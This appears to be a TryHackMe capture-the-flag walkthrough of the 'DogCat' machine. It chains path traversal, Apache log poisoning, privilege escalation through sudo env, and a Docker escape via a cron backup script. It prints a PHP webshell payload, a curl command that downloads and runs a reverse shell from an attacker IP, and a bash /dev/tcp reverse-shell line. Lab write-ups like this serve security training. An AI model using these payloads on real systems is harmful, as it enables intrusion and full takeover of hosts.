CTF Walkthroughs, TryHackMe

TryHackMe – DogCat Walkthrough

Introduction

This was an intermediate Linux machine that involved capturing four flags by exploiting local file inclusion (through Apache log poisoning), the env binary with Sudo permissions enabled and a misconfigured cron job which allowed to escape the Docker container and access the underlying system.

Enumeration

The first thing to do is to run a TCP Nmap scan against the 1000 most common ports, and using the following flags:

  • -sC to run default scripts
  • -sV to enumerate applications versions

The scan has identified two open ports: port 22 (SSH) and port 80(HTTP), so the next step will be to start enumerating HTTP.

First Flag

When accessing the webserver through a browser, the following page is displayed:

Upon selecting one of the options, a random dog or cat picture is displayed:

The view parameter used by the endpoint seems to be vulnerable to path traversal,

The next step is to run a scan to find hidden files or directories using Gobuster, with the following flags:

  • dir to specify the scan should be done against directories and files
  • -u to specify the target URL
  • -w to specify the word list to use
  • -x to specify the extensions to enumerate
  • -t to specify the number of concurrent threads

The scan has revealed a “flag.php” file. Trying to access it through path traversal:

It appears that this will only work if either “cat” or “dog” is part of the URL. Including dogs in the request and using path traversal after that to access the flag, with PHP filters:

Since this type of payload returns the base64-encoded contents of the file, it needs to be decoded:

Second Flag

It appears that only PHP files can be extracted through this method:

Extracting the contents of the index.php file to view the logic that is currently implemented:

Decoding the contents, it appears if an “ext” get parameter is not provided, it defaults to PHP as a file extension:

Adding an “ext” parameter and making it blank allows to access the /etc/passwd file:

When decoding it, it doesn’t look like any unusual user exists on the box:

Apache log poisoning can be used, by adding the following payload in the user agent header:

<?php system($_GET['test']);?>

The access.log file can then be accessed through path traversal and a “test” get parameter can be used to execute arbitrary commands:

Copying the Laudanum PHP Reverse Shell to the current directory and amending the IP address and port accordingly:

Setting up a Python Simple HTTP Server to host the shell:

Running the following command to download it and make it executable:

curl 10.4.36.186/php-reverse-shell.php -o shell.php && chmod +x /tmp/shell && /tmp/shell

The PHP reverse shell was downloaded:

The next step is to set up a Netcat listener, which will catch the reverse shell when it is executed by the victim host, using the following flags:

  • -l to listen for incoming connections
  • -v for verbose output
  • -n to skip the DNS lookup
  • -p to specify the port to listen on

Executing the shell by navigating to the file from a browser:

A callback was received on the Netcat listener, granting a reverse shell as the www-data user:

Looking for files that include the “flag” text within their name:

find / -name *flag* 2>/dev/null

There appears to be a flag under /var/www, viewing it:

Third Flag

Obtaining an interactive shell:

script -qc /bin/bash /dev/null
stty raw -echo

When executing sudo -l, it appears www-data can execute /usr/bin/env as root:

Upon consulting GTFOBins, it appears this can be exploited to escalate privileges to root through the following command:

sudo env /bin/sh

Executing the command to escalate privileges:

The /root folder appears to contain the third flag:

Fourth Flag

Found a backup script in the /opt/backups folder, the current shell appears to be within a Docker container and the main system is backing it up regularly, probably through a cron job:

Adding a new line to execute a Bash reverse shell when it runs:

echo "bash -i >& /dev/tcp/10.4.36.186/443 0>&1" >> backup.sh

The next step is to set up a Netcat listener, which will catch the reverse shell when it is executed by the victim host, using the following flags:

  • -l to listen for incoming connections
  • -v for verbose output
  • -n to skip the DNS lookup
  • -p to specify the port to listen on

After a few minutes, received a callback on the Netcat listener, finally granting root-level access to the actual machine:

The flag can be found in the /root folder:

Conclusion

This was quite an interesting machine, as exploiting the path traversal vulnerability properly required a bit of thinking, the privilege escalation part was pretty straightforward although the Docker escape added an extra challenge.